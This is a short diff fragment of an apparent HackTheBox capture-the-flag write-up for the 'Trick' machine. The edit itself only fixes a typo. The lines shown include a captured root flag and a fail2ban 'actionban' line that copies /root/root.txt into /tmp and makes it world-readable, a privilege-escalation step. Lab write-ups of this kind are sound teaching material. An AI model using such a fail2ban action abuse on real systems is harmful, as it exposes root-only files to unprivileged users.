Rogue-1/HTB/FullPWN/Trick.md

 # cat /root/root.txt
 de94b9107c1d74a9877a605ecf2d0431
 ```
-Originally I had was having too many issues with a reverse shell so I opted for changing the root.txt flag to the tmp folder.
+Originally I was having too many issues with a reverse shell so I opted for changing the root.txt flag to the tmp folder.
 Which is still a win but it doesnt feel the same without gaining root.

 ```console
 actionban = cat /root/root.txt > /tmp/root.txt && chmod 777 /tmp/root.txt